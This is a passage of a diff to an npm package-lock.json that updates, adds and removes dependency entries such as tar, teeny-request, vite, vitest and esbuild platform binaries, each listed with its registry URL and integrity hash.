"sha512-v9iyEQJH6ZntoENr9/yXxjuezh4My67CBSu9r6Ve/05Iu5gNgnisNWOsoJHTP6k0Rr0+HQIpnH+kyammu90q/g==", + "license": "MIT", + "dependencies": { + "@octokit/types": "^13.1.0", + "deprecation": "^2.0.0", + "once": "^1.4.0" + }, + "engines": { + "node": ">= 18" + } + }, + "node_modules/probot/node_modules/@octokit/request-error/node_modules/@octokit/types": { + "version": "13.10.0", + "resolved": "https://registry.npmjs.org/@octokit/types/-/types-13.10.0.tgz", + "integrity": "sha512-ifLaO34EbbPj0Xgro4G5lP5asESjwHracYJvVaPIyXMuiuXLlhic3S47cBdTb+jfODkTE5YtGCLt3Ay3+J97sA==", + "license": "MIT", + "dependencies": { + "@octokit/openapi-types": "^24.2.0" + } + }, "node_modules/probot/node_modules/commander": { "version": "12.1.0", "resolved": "https://registry.npmjs.org/commander/-/commander-12.1.0.tgz", @@ -22782,22 +22529,23 @@ } }, "node_modules/proto3-json-serializer": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/proto3-json-serializer/-/proto3-json-serializer-2.0.2.tgz", - "integrity": "sha512-SAzp/O4Yh02jGdRc+uIrGoe87dkN/XtwxfZ4ZyafJHymd79ozp5VG5nyZ7ygqPM5+cpLDjjGnYFUkngonyDPOQ==", + "version": "3.0.4", + "resolved": "https://registry.npmjs.org/proto3-json-serializer/-/proto3-json-serializer-3.0.4.tgz", + "integrity": "sha512-E1sbAYg3aEbXrq0n1ojJkRHQJGE1kaE/O6GLA94y8rnJBfgvOPTOd1b9hOceQK1FFZI9qMh1vBERCyO2ifubcw==", "license": "Apache-2.0", "dependencies": { - "protobufjs": "^7.2.5" + "protobufjs": "^7.4.0" }, "engines": { - "node": ">=14.0.0" + "node": ">=18" } }, "node_modules/protobufjs": { - "version": "7.4.0", - "resolved": "https://registry.npmjs.org/protobufjs/-/protobufjs-7.4.0.tgz", - "integrity": "sha512-mRUWCc3KUU4w1jU8sGxICXH/gNS94DvI1gxqDvBzhj1JpcsimQkYiOJfwsPUykUI5ZaspFbSgmBLER8IrQ3tqw==", + "version": "7.5.4", + "resolved": "https://registry.npmjs.org/protobufjs/-/protobufjs-7.5.4.tgz", + "integrity": "sha512-CvexbZtbov6jW2eXAvLukXjXUW1TzFaivC46BpWc/3BpcCysb5Vffu+B3XHMm8lVEuy2Mm4XGex8hBSg1yapPg==", "hasInstallScript": true, + "license": "BSD-3-Clause", "dependencies": { "@protobufjs/aspromise": "^1.1.2", "@protobufjs/base64": "^1.1.2", @@ -22892,15 +22640,6 @@ "url": "https://github.com/sponsors/ljharb" } }, - "node_modules/querystring": { - "version": "0.2.0", - "resolved": "https://registry.npmjs.org/querystring/-/querystring-0.2.0.tgz", - "integrity": "sha512-X/xY82scca2tau62i9mDyU9K+I+djTMUsvwf7xnUX5GLvVzgJybOJf4Y6o9Zx3oJK/LSXg5tTZBjwzqVPaPO2g==", - "deprecated": "The querystring API is considered Legacy. new code should use the URLSearchParams API instead.", - "engines": { - "node": ">=0.4.x" - } - }, "node_modules/queue-lit": { "version": "1.5.2", "resolved": "https://registry.npmjs.org/queue-lit/-/queue-lit-1.5.2.tgz", @@ -23275,16 +23014,6 @@ "url": "https://github.com/sponsors/isaacs" } }, - "node_modules/react-email/node_modules/minipass": { - "version": "7.1.2", - "resolved": "https://registry.npmjs.org/minipass/-/minipass-7.1.2.tgz", - "integrity": "sha512-qOOzS1cBTWYF4BH8fVePDBOO9iptMnGUEZwNc/cMWnTV2nVLZ7VoNWEPHkYczZA0pdoA7dl6e7FL659nX9S2aw==", - "dev": true, - "license": "ISC", - "engines": { - "node": ">=16 || 14 >=14.17" - } - }, "node_modules/react-email/node_modules/onetime": { "version": "7.0.0", "resolved": "https://registry.npmjs.org/onetime/-/onetime-7.0.0.tgz", @@ -23625,6 +23354,7 @@ "version": "2.1.1", "resolved": "https://registry.npmjs.org/require-directory/-/require-directory-2.1.1.tgz", "integrity": "sha512-fGxEI7+wsG9xrvdjsrlmL22OMTTiHRwAMroiEeMgq8gzoLC/PQr7RsRDSTLUg/bZAZtF+TVIkHc6/4RIKrui+Q==", + "license": "MIT", "engines": { "node": ">=0.10.0" } @@ -23700,22 +23430,6 @@ "url": "https://github.com/privatenumber/resolve-pkg-maps?sponsor=1" } }, - "node_modules/restore-cursor": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/restore-cursor/-/restore-cursor-4.0.0.tgz", - "integrity": "sha512-I9fPXU9geO9bHOt9pHHOhOkYerIMsmVaWB0rA2AI9ERh/+x/i7MV5HKBNrg+ljO5eoPVgCcnFuRjJ9uH6I/3eg==", - "dev": true, - "dependencies": { - "onetime": "^5.1.0", - "signal-exit": "^3.0.2" - }, - "engines": { - "node": "^12.20.0 || ^14.13.1 || >=16.0.0" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, "node_modules/ret": { "version": "0.4.3", "resolved": "https://registry.npmjs.org/ret/-/ret-0.4.3.tgz", @@ -23734,17 +23448,16 @@ } }, "node_modules/retry-request": { - "version": "7.0.2", - "resolved": "https://registry.npmjs.org/retry-request/-/retry-request-7.0.2.tgz", - "integrity": "sha512-dUOvLMJ0/JJYEn8NrpOaGNE7X3vpI5XlZS/u0ANjqtcZVKnIxP7IgCFwrKTxENw29emmwug53awKtaMm4i9g5w==", + "version": "8.0.2", + "resolved": "https://registry.npmjs.org/retry-request/-/retry-request-8.0.2.tgz", + "integrity": "sha512-JzFPAfklk1kjR1w76f0QOIhoDkNkSqW8wYKT08n9yysTmZfB+RQ2QoXoTAeOi1HD9ZipTyTAZg3c4pM/jeqgSw==", "license": "MIT", "dependencies": { - "@types/request": "^2.48.8", "extend": "^3.0.2", - "teeny-request": "^9.0.0" + "teeny-request": "^10.0.0" }, "engines": { - "node": ">=14" + "node": ">=18" } }, "node_modules/reusify": { @@ -23970,6 +23683,7 @@ "version": "1.1.0", "resolved": "https://registry.npmjs.org/safe-regex-test/-/safe-regex-test-1.1.0.tgz", "integrity": "sha512-x/+Cz4YrimQxQccJf5mKEbIa1NzeCRNI5Ecl/ekmlYaampdNLPalVyIcCZNNH3MvmqBugV5TMYZXv0ljslUlaw==", + "dev": true, "license": "MIT", "dependencies": { "call-bound": "^1.0.2", @@ -24971,15 +24685,6 @@ "node": "^20.17.0 || >=22.9.0" } }, - "node_modules/ssri/node_modules/minipass": { - "version": "7.1.3", - "resolved": "https://registry.npmjs.org/minipass/-/minipass-7.1.3.tgz", - "integrity": "sha512-tEBHqDnIoM/1rXME1zgka9g6Q2lcoCkxHLuc7ODJ5BxbP5d4c2Z5cGgtXAku59200Cx7diuHTOYfSBD8n6mm8A==", - "license": "BlueOak-1.0.0", - "engines": { - "node": ">=16 || 14 >=14.17" - } - }, "node_modules/stack-trace": { "version": "0.0.10", "resolved": "https://registry.npmjs.org/stack-trace/-/stack-trace-0.0.10.tgz", @@ -25016,21 +24721,6 @@ "dev": true, "license": "MIT" }, - "node_modules/stdin-discarder": { - "version": "0.1.0", - "resolved": "https://registry.npmjs.org/stdin-discarder/-/stdin-discarder-0.1.0.tgz", - "integrity": "sha512-xhV7w8S+bUwlPTb4bAOUQhv8/cSS5offJuX8GQGq32ONF0ZtDWKfkdomM3HMRA+LhX6um/FZ0COqlwsjD53LeQ==", - "dev": true, - "dependencies": { - "bl": "^5.0.0" - }, - "engines": { - "node": "^12.20.0 || ^14.13.1 || >=16.0.0" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, "node_modules/stream-events": { "version": "1.0.5", "resolved": "https://registry.npmjs.org/stream-events/-/stream-events-1.0.5.tgz", @@ -25069,23 +24759,6 @@ "safe-buffer": "~5.2.0" } }, - "node_modules/string-width": { - "version": "6.1.0", - "resolved": "https://registry.npmjs.org/string-width/-/string-width-6.1.0.tgz", - "integrity": "sha512-k01swCJAgQmuADB0YIc+7TuatfNvTBVOoaUWJjTB9R4VJzR5vNWzf5t42ESVZFPS8xTySF7CAdV4t/aaIm3UnQ==", - "dev": true, - "dependencies": { - "eastasianwidth": "^0.2.0", - "emoji-regex": "^10.2.1", - "strip-ansi": "^7.0.1" - }, - "engines": { - "node": ">=16" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, "node_modules/string-width-cjs": { "name": "string-width", "version": "4.2.3", @@ -25243,9 +24916,9 @@ "license": "MIT" }, "node_modules/strnum": { - "version": "2.2.2", - "resolved": "https://registry.npmjs.org/strnum/-/strnum-2.2.2.tgz", - "integrity": "sha512-DnR90I+jtXNSTXWdwrEy9FakW7UX+qUZg28gj5fk2vxxl7uS/3bpI4fjFYVmdK9etptYBPNkpahuQnEwhwECqA==", + "version": "2.2.3", + "resolved": "https://registry.npmjs.org/strnum/-/strnum-2.2.3.tgz", + "integrity": "sha512-oKx6RUCuHfT3oyVjtnrmn19H1SiCqgJSg+54XqURKp5aCMbrXrhLjRN9TjuwMjiYstZ0MzDrHqkGZ5dFTKd+zg==", "funding": [ { "type": "github", @@ -25439,19 +25112,28 @@ } }, "node_modules/tar": { - "version": "6.2.1", - "resolved": "https://registry.npmjs.org/tar/-/tar-6.2.1.tgz", - "integrity": "sha512-DZ4yORTwrbTj/7MZYq2w+/ZFdI6OZ/f9SFHR+71gIVUZhOQPHzVCLpvRnPgyaMpfWxxk/4ONva3GQSyNIKRv6A==", - "dependencies": { - "chownr": "^2.0.0", - "fs-minipass": "^2.0.0", - "minipass": "^5.0.0", - "minizlib": "^2.1.1", - "mkdirp": "^1.0.3", - "yallist": "^4.0.0" + "version": "7.5.13", + "resolved": "https://registry.npmjs.org/tar/-/tar-7.5.13.tgz", + "integrity": "sha512-tOG/7GyXpFevhXVh8jOPJrmtRpOTsYqUIkVdVooZYJS/z8WhfQUX8RJILmeuJNinGAMSu1veBr4asSHFt5/hng==", + "license": "BlueOak-1.0.0", + "dependencies": { + "@isaacs/fs-minipass": "^4.0.0", + "chownr": "^3.0.0", + "minipass": "^7.1.2", + "minizlib": "^3.1.0", + "yallist": "^5.0.0" }, "engines": { - "node": ">=10" + "node": ">=18" + } + }, + "node_modules/tar/node_modules/yallist": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/yallist/-/yallist-5.0.0.tgz", + "integrity": "sha512-YgvUTfwqyc7UXVMrB+SImsVYSmTS8X/tSrtdNZMImM+n7+QTriRXyXim0mBrTXNeqzVF0KWGgHPeiyViFFrNDw==", + "license": "BlueOak-1.0.0", + "engines": { + "node": ">=18" } }, "node_modules/tarn": { @@ -25493,25 +25175,33 @@ } }, "node_modules/teeny-request": { - "version": "9.0.0", - "resolved": "https://registry.npmjs.org/teeny-request/-/teeny-request-9.0.0.tgz", - "integrity": "sha512-resvxdc6Mgb7YEThw6G6bExlXKkv6+YbuzGg9xuXxSgxJF7Ozs+o8Y9+2R3sArdWdW8nOokoQb1yrpFB0pQK2g==", + "version": "10.1.2", + "resolved": "https://registry.npmjs.org/teeny-request/-/teeny-request-10.1.2.tgz", + "integrity": "sha512-Xj0ZAQ0CeuQn6UxCDPLbFRlgcSTUEyO3+wiepr2grjIjyL/lMMs1Z4OwXn8kLvn/V1OuaEP0UY7Na6UDNNsYrQ==", "license": "Apache-2.0", "dependencies": { - "http-proxy-agent": "^5.0.0", - "https-proxy-agent": "^5.0.0", - "node-fetch": "^2.6.9", - "stream-events": "^1.0.5", - "uuid": "^9.0.0" + "http-proxy-agent": "^7.0.0", + "https-proxy-agent": "^7.0.1", + "node-fetch": "^3.3.2", + "stream-events": "^1.0.5" }, "engines": { - "node": ">=14" + "node": ">=18" + } + }, + "node_modules/teeny-request/node_modules/agent-base": { + "version": "7.1.4", + "resolved": "https://registry.npmjs.org/agent-base/-/agent-base-7.1.4.tgz", + "integrity": "sha512-MnA+YT8fwfJPgBx3m60MNqakm30XOkyIoH1y6huTQvC0PwZG7ki8NacLBcrPbNoo8vEZy7Jpuk7+jMO+CUovTQ==", + "license": "MIT", + "engines": { + "node": ">= 14" } }, "node_modules/teeny-request/node_modules/debug": { - "version": "4.3.7", - "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.7.tgz", - "integrity": "sha512-Er2nc/H7RrMXZBFCEim6TCmMk02Z8vLC2Rbi1KEBggpo0fS6l0S1nnapwmIi3yW/+GOJap1Krg4w0Hg80oCqgQ==", + "version": "4.4.3", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.4.3.tgz", + "integrity": "sha512-RGwwWnwQvkVfavKVt22FGLw+xYSdzARwm0ru6DhTVA3umU5hZc28V3kO4stgYryrTlLpuvgI9GiijltAjNbcqA==", "license": "MIT", "dependencies": { "ms": "^2.1.3" @@ -25525,31 +25215,35 @@ } } }, - "node_modules/teeny-request/node_modules/http-proxy-agent": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/http-proxy-agent/-/http-proxy-agent-5.0.0.tgz", - "integrity": "sha512-n2hY8YdoRE1i7r6M0w9DIw5GgZN0G25P8zLCRQ8rjXtTU3vsNFBI/vWK/UIeE6g5MUUz6avwAPXmL6Fy9D/90w==", + "node_modules/teeny-request/node_modules/https-proxy-agent": { + "version": "7.0.6", + "resolved": "https://registry.npmjs.org/https-proxy-agent/-/https-proxy-agent-7.0.6.tgz", + "integrity": "sha512-vK9P5/iUfdl95AI+JVyUuIcVtd4ofvtrOr3HNtM2yxC9bnMbEdp3x01OhQNnjb8IJYi38VlTE3mBXwcfvywuSw==", "license": "MIT", "dependencies": { - "@tootallnate/once": "2", - "agent-base": "6", + "agent-base": "^7.1.2", "debug": "4" }, "engines": { - "node": ">= 6" + "node": ">= 14" } }, - "node_modules/teeny-request/node_modules/uuid": { - "version": "9.0.1", - "resolved": "https://registry.npmjs.org/uuid/-/uuid-9.0.1.tgz", - "integrity": "sha512-b+1eJOlsR9K8HJpow9Ok3fiWOWSIcIzXodvv0rQjVoOVNpWMpxf1wZNpt4y9h10odCNrqnYp1OBzRktckBe3sA==", - "funding": [ - "https://github.com/sponsors/broofa", - "https://github.com/sponsors/ctavan" - ], + "node_modules/teeny-request/node_modules/node-fetch": { + "version": "3.3.2", + "resolved": "https://registry.npmjs.org/node-fetch/-/node-fetch-3.3.2.tgz", + "integrity": "sha512-dRB78srN/l6gqWulah9SrxeYnxeddIG30+GOqK/9OlLVyLg3HPnr6SqOWTWOXKRwC2eGYCkZ59NNuSgvSrpgOA==", "license": "MIT", - "bin": { - "uuid": "dist/bin/uuid" + "dependencies": { + "data-uri-to-buffer": "^4.0.0", + "fetch-blob": "^3.1.4", + "formdata-polyfill": "^4.0.10" + }, + "engines": { + "node": "^12.20.0 || ^14.13.1 || >=16.0.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/node-fetch" } }, "node_modules/text-hex": { @@ -26534,35 +26228,6 @@ "integrity": "sha512-HXgFDgDommxn5/bIv0cnQZsPhHDA90NPHD6+c/v21U5+Sx5hoP8+dP9IZXBU1gIfvdRfhG8cel9QNPeionfcCQ==", "license": "MIT" }, - "node_modules/url": { - "version": "0.10.3", - "resolved": "https://registry.npmjs.org/url/-/url-0.10.3.tgz", - "integrity": "sha512-hzSUW2q06EqL1gKM/a+obYHLIO6ct2hwPuviqTTOcfFVc61UbfJ2Q32+uGL/HCPxKqrdGB5QUwIe7UqlDgwsOQ==", - "license": "MIT", - "dependencies": { - "punycode": "1.3.2", - "querystring": "0.2.0" - } - }, - "node_modules/url/node_modules/punycode": { - "version": "1.3.2", - "resolved": "https://registry.npmjs.org/punycode/-/punycode-1.3.2.tgz", - "integrity": "sha512-RofWgt/7fL5wP1Y7fxE7/EmTLzQVnB0ycyibJ0OOHIlJqTNzglYFxVwETOcIoJqJmpDXJ9xImDv+Fq34F/d4Dw==", - "license": "MIT" - }, - "node_modules/util": { - "version": "0.12.5", - "resolved": "https://registry.npmjs.org/util/-/util-0.12.5.tgz", - "integrity": "sha512-kZf/K6hEIrWHI6XqOFUiiMa+79wE/D8Q+NCNAWclkyg3b4d2k7s0QGepNjiABc+aR3N1PAyHL7p6UcLY6LmrnA==", - "license": "MIT", - "dependencies": { - "inherits": "^2.0.3", - "is-arguments": "^1.0.4", - "is-generator-function": "^1.0.7", - "is-typed-array": "^1.1.3", - "which-typed-array": "^1.1.2" - } - }, "node_modules/util-deprecate": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/util-deprecate/-/util-deprecate-1.0.2.tgz", @@ -26650,68 +26315,14 @@ "node": ">=0.6.0" } }, - "node_modules/vite-node": { - "version": "3.2.4", - "resolved": "https://registry.npmjs.org/vite-node/-/vite-node-3.2.4.tgz", - "integrity": "sha512-EbKSKh+bh1E1IFxeO0pg1n4dvoOTt0UDiXMd/qn++r98+jPO1xtJilvXldeuQ8giIB5IkpjCgMleHMNEsGH6pg==", - "dev": true, - "license": "MIT", - "dependencies": { - "cac": "^6.7.14", - "debug": "^4.4.1", - "es-module-lexer": "^1.7.0", - "pathe": "^2.0.3", - "vite": "^5.0.0 || ^6.0.0 || ^7.0.0-0" - }, - "bin": { - "vite-node": "vite-node.mjs" - }, - "engines": { - "node": "^18.0.0 || ^20.0.0 || >=22.0.0" - }, - "funding": { - "url": "https://opencollective.com/vitest" - } - }, - "node_modules/vite-node/node_modules/debug": { - "version": "4.4.3", - "resolved": "https://registry.npmjs.org/debug/-/debug-4.4.3.tgz", - "integrity": "sha512-RGwwWnwQvkVfavKVt22FGLw+xYSdzARwm0ru6DhTVA3umU5hZc28V3kO4stgYryrTlLpuvgI9GiijltAjNbcqA==", - "dev": true, - "license": "MIT", - "dependencies": { - "ms": "^2.1.3" - }, - "engines": { - "node": ">=6.0" - }, - "peerDependenciesMeta": { - "supports-color": { - "optional": true - } - } - }, - "node_modules/vite-node/node_modules/picomatch": { - "version": "4.0.4", - "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-4.0.4.tgz", - "integrity": "sha512-QP88BAKvMam/3NxH6vj2o21R6MjxZUAd6nlwAS/pnGvN9IVLocLHxGYIzFhg6fUQ+5th6P4dv4eW9jX3DSIj7A==", - "dev": true, - "license": "MIT", - "engines": { - "node": ">=12" - }, - "funding": { - "url": "https://github.com/sponsors/jonschlinkert" - } - }, - "node_modules/vite-node/node_modules/vite": { - "version": "7.1.12", - "resolved": "https://registry.npmjs.org/vite/-/vite-7.1.12.tgz", - "integrity": "sha512-ZWyE8YXEXqJrrSLvYgrRP7p62OziLW7xI5HYGWFzOvupfAlrLvURSzv/FyGyy0eidogEM3ujU+kUG1zuHgb6Ug==", + "node_modules/vite": { + "version": "7.3.2", + "resolved": "https://registry.npmjs.org/vite/-/vite-7.3.2.tgz", + "integrity": "sha512-Bby3NOsna2jsjfLVOHKes8sGwgl4TT0E6vvpYgnAYDIF/tie7MRaFthmKuHx1NSXjiTueXH3do80FMQgvEktRg==", "dev": true, "license": "MIT", "dependencies": { - "esbuild": "^0.25.0", + "esbuild": "^0.27.0", "fdir": "^6.5.0", "picomatch": "^4.0.3", "postcss": "^8.5.6", @@ -26779,107 +26390,30 @@ } } }, - "node_modules/vitest": { + "node_modules/vite-node": { "version": "3.2.4", - "resolved": "https://registry.npmjs.org/vitest/-/vitest-3.2.4.tgz", - "integrity": "sha512-LUCP5ev3GURDysTWiP47wRRUpLKMOfPh+yKTx3kVIEiu5KOMeqzpnYNsKyOoVrULivR8tLcks4+lga33Whn90A==", + "resolved": "https://registry.npmjs.org/vite-node/-/vite-node-3.2.4.tgz", + "integrity": "sha512-EbKSKh+bh1E1IFxeO0pg1n4dvoOTt0UDiXMd/qn++r98+jPO1xtJilvXldeuQ8giIB5IkpjCgMleHMNEsGH6pg==", "dev": true, "license": "MIT", "dependencies": { - "@types/chai": "^5.2.2", - "@vitest/expect": "3.2.4", - "@vitest/mocker": "3.2.4", - "@vitest/pretty-format": "^3.2.4", - "@vitest/runner": "3.2.4", - "@vitest/snapshot": "3.2.4", - "@vitest/spy": "3.2.4", - "@vitest/utils": "3.2.4", - "chai": "^5.2.0", + "cac": "^6.7.14", "debug": "^4.4.1", - "expect-type": "^1.2.1", - "magic-string": "^0.30.17", + "es-module-lexer": "^1.7.0", "pathe": "^2.0.3", - "picomatch": "^4.0.2", - "std-env": "^3.9.0", - "tinybench": "^2.9.0", - "tinyexec": "^0.3.2", - "tinyglobby": "^0.2.14", - "tinypool": "^1.1.1", - "tinyrainbow": "^2.0.0", - "vite": "^5.0.0 || ^6.0.0 || ^7.0.0-0", - "vite-node": "3.2.4", - "why-is-node-running": "^2.3.0" + "vite": "^5.0.0 || ^6.0.0 || ^7.0.0-0" }, "bin": { - "vitest": "vitest.mjs" + "vite-node": "vite-node.mjs" }, "engines": { "node": "^18.0.0 || ^20.0.0 || >=22.0.0" }, "funding": { "url": "https://opencollective.com/vitest" - }, - "peerDependencies": { - "@edge-runtime/vm": "*", - "@types/debug": "^4.1.12", - "@types/node": "^18.0.0 || ^20.0.0 || >=22.0.0", - "@vitest/browser": "3.2.4", - "@vitest/ui": "3.2.4", - "happy-dom": "*", - "jsdom": "*" - }, - "peerDependenciesMeta": { - "@edge-runtime/vm": { - "optional": true - }, - "@types/debug": { - "optional": true - }, - "@types/node": { - "optional": true - }, - "@vitest/browser": { - "optional": true - }, - "@vitest/ui": { - "optional": true - }, - "happy-dom": { - "optional": true - }, - "jsdom": { - "optional": true - } - } - }, - "node_modules/vitest/node_modules/@vitest/mocker": { - "version": "3.2.4", - "resolved": "https://registry.npmjs.org/@vitest/mocker/-/mocker-3.2.4.tgz", - "integrity": "sha512-46ryTE9RZO/rfDd7pEqFl7etuyzekzEhUbTW3BvmeO/BcCMEgq59BKhek3dXDWgAj4oMK6OZi+vRr1wPW6qjEQ==", - "dev": true, - "license": "MIT", - "dependencies": { - "@vitest/spy": "3.2.4", - "estree-walker": "^3.0.3", - "magic-string": "^0.30.17" - }, - "funding": { - "url": "https://opencollective.com/vitest" - }, - "peerDependencies": { - "msw": "^2.4.9", - "vite": "^5.0.0 || ^6.0.0 || ^7.0.0-0" - }, - "peerDependenciesMeta": { - "msw": { - "optional": true - }, - "vite": { - "optional": true - } } }, - "node_modules/vitest/node_modules/debug": { + "node_modules/vite-node/node_modules/debug": { "version": "4.4.3", "resolved": "https://registry.npmjs.org/debug/-/debug-4.4.3.tgz", "integrity": "sha512-RGwwWnwQvkVfavKVt22FGLw+xYSdzARwm0ru6DhTVA3umU5hZc28V3kO4stgYryrTlLpuvgI9GiijltAjNbcqA==", @@ -26897,94 +26431,634 @@ } } }, - "node_modules/vitest/node_modules/picomatch": { - "version": "4.0.4", - "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-4.0.4.tgz", - "integrity": "sha512-QP88BAKvMam/3NxH6vj2o21R6MjxZUAd6nlwAS/pnGvN9IVLocLHxGYIzFhg6fUQ+5th6P4dv4eW9jX3DSIj7A==", + "node_modules/vite/node_modules/@esbuild/aix-ppc64": { + "version": "0.27.7", + "resolved": "https://registry.npmjs.org/@esbuild/aix-ppc64/-/aix-ppc64-0.27.7.tgz", + "integrity": "sha512-EKX3Qwmhz1eMdEJokhALr0YiD0lhQNwDqkPYyPhiSwKrh7/4KRjQc04sZ8db+5DVVnZ1LmbNDI1uAMPEUBnQPg==", + "cpu": [ + "ppc64" + ], "dev": true, "license": "MIT", + "optional": true, + "os": [ + "aix" + ], "engines": { - "node": ">=12" - }, - "funding": { - "url": "https://github.com/sponsors/jonschlinkert" + "node": ">=18" } }, - "node_modules/vitest/node_modules/vite": { - "version": "7.1.12", - "resolved": "https://registry.npmjs.org/vite/-/vite-7.1.12.tgz", - "integrity": "sha512-ZWyE8YXEXqJrrSLvYgrRP7p62OziLW7xI5HYGWFzOvupfAlrLvURSzv/FyGyy0eidogEM3ujU+kUG1zuHgb6Ug==", + "node_modules/vite/node_modules/@esbuild/android-arm": { + "version": "0.27.7", + "resolved": "https://registry.npmjs.org/@esbuild/android-arm/-/android-arm-0.27.7.tgz", + "integrity": "sha512-jbPXvB4Yj2yBV7HUfE2KHe4GJX51QplCN1pGbYjvsyCZbQmies29EoJbkEc+vYuU5o45AfQn37vZlyXy4YJ8RQ==", + "cpu": [ + "arm" + ], "dev": true, "license": "MIT", - "dependencies": { - "esbuild": "^0.25.0", - "fdir": "^6.5.0", - "picomatch": "^4.0.3", - "postcss": "^8.5.6", - "rollup": "^4.43.0", - "tinyglobby": "^0.2.15" - }, - "bin": { - "vite": "bin/vite.js" - }, + "optional": true, + "os": [ + "android" + ], "engines": { - "node": "^20.19.0 || >=22.12.0" - }, - "funding": { - "url": "https://github.com/vitejs/vite?sponsor=1" - }, - "optionalDependencies": { - "fsevents": "~2.3.3" - }, - "peerDependencies": { - "@types/node": "^20.19.0 || >=22.12.0", - "jiti": ">=1.21.0", - "less": "^4.0.0", - "lightningcss": "^1.21.0", - "sass": "^1.70.0", - "sass-embedded": "^1.70.0", - "stylus": ">=0.54.8", - "sugarss": "^5.0.0", - "terser": "^5.16.0", - "tsx": "^4.8.1", - "yaml": "^2.4.2" - }, - "peerDependenciesMeta": { - "@types/node": { - "optional": true - }, - "jiti": { - "optional": true - }, - "less": { - "optional": true - }, - "lightningcss": { - "optional": true - }, - "sass": { - "optional": true - }, - "sass-embedded": { - "optional": true - }, - "stylus": { + "node": ">=18" + } + }, + "node_modules/vite/node_modules/@esbuild/android-arm64": { + "version": "0.27.7", + "resolved": "https://registry.npmjs.org/@esbuild/android-arm64/-/android-arm64-0.27.7.tgz", + "integrity": "sha512-62dPZHpIXzvChfvfLJow3q5dDtiNMkwiRzPylSCfriLvZeq0a1bWChrGx/BbUbPwOrsWKMn8idSllklzBy+dgQ==", + "cpu": [ + "arm64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "android" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/vite/node_modules/@esbuild/android-x64": { + "version": "0.27.7", + "resolved": "https://registry.npmjs.org/@esbuild/android-x64/-/android-x64-0.27.7.tgz", + "integrity": "sha512-x5VpMODneVDb70PYV2VQOmIUUiBtY3D3mPBG8NxVk5CogneYhkR7MmM3yR/uMdITLrC1ml/NV1rj4bMJuy9MCg==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "android" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/vite/node_modules/@esbuild/darwin-arm64": { + "version": "0.27.7", + "resolved": "https://registry.npmjs.org/@esbuild/darwin-arm64/-/darwin-arm64-0.27.7.tgz", + "integrity": "sha512-5lckdqeuBPlKUwvoCXIgI2D9/ABmPq3Rdp7IfL70393YgaASt7tbju3Ac+ePVi3KDH6N2RqePfHnXkaDtY9fkw==", + "cpu": [ + "arm64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "darwin" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/vite/node_modules/@esbuild/darwin-x64": { + "version": "0.27.7", + "resolved": "https://registry.npmjs.org/@esbuild/darwin-x64/-/darwin-x64-0.27.7.tgz", + "integrity": "sha512-rYnXrKcXuT7Z+WL5K980jVFdvVKhCHhUwid+dDYQpH+qu+TefcomiMAJpIiC2EM3Rjtq0sO3StMV/+3w3MyyqQ==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "darwin" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/vite/node_modules/@esbuild/freebsd-arm64": { + "version": "0.27.7", + "resolved": "https://registry.npmjs.org/@esbuild/freebsd-arm64/-/freebsd-arm64-0.27.7.tgz", + "integrity": "sha512-B48PqeCsEgOtzME2GbNM2roU29AMTuOIN91dsMO30t+Ydis3z/3Ngoj5hhnsOSSwNzS+6JppqWsuhTp6E82l2w==", + "cpu": [ + "arm64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "freebsd" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/vite/node_modules/@esbuild/freebsd-x64": { + "version": "0.27.7", + "resolved": "https://registry.npmjs.org/@esbuild/freebsd-x64/-/freebsd-x64-0.27.7.tgz", + "integrity": "sha512-jOBDK5XEjA4m5IJK3bpAQF9/Lelu/Z9ZcdhTRLf4cajlB+8VEhFFRjWgfy3M1O4rO2GQ/b2dLwCUGpiF/eATNQ==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "freebsd" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/vite/node_modules/@esbuild/linux-arm": { + "version": "0.27.7", + "resolved": "https://registry.npmjs.org/@esbuild/linux-arm/-/linux-arm-0.27.7.tgz", + "integrity": "sha512-RkT/YXYBTSULo3+af8Ib0ykH8u2MBh57o7q/DAs3lTJlyVQkgQvlrPTnjIzzRPQyavxtPtfg0EopvDyIt0j1rA==", + "cpu": [ + "arm" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/vite/node_modules/@esbuild/linux-arm64": { + "version": "0.27.7", + "resolved": "https://registry.npmjs.org/@esbuild/linux-arm64/-/linux-arm64-0.27.7.tgz", + "integrity": "sha512-RZPHBoxXuNnPQO9rvjh5jdkRmVizktkT7TCDkDmQ0W2SwHInKCAV95GRuvdSvA7w4VMwfCjUiPwDi0ZO6Nfe9A==", + "cpu": [ + "arm64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/vite/node_modules/@esbuild/linux-ia32": { + "version": "0.27.7", + "resolved": "https://registry.npmjs.org/@esbuild/linux-ia32/-/linux-ia32-0.27.7.tgz", + "integrity": "sha512-GA48aKNkyQDbd3KtkplYWT102C5sn/EZTY4XROkxONgruHPU72l+gW+FfF8tf2cFjeHaRbWpOYa/uRBz/Xq1Pg==", + "cpu": [ + "ia32" + ], + "dev": true, + "license": "MIT", 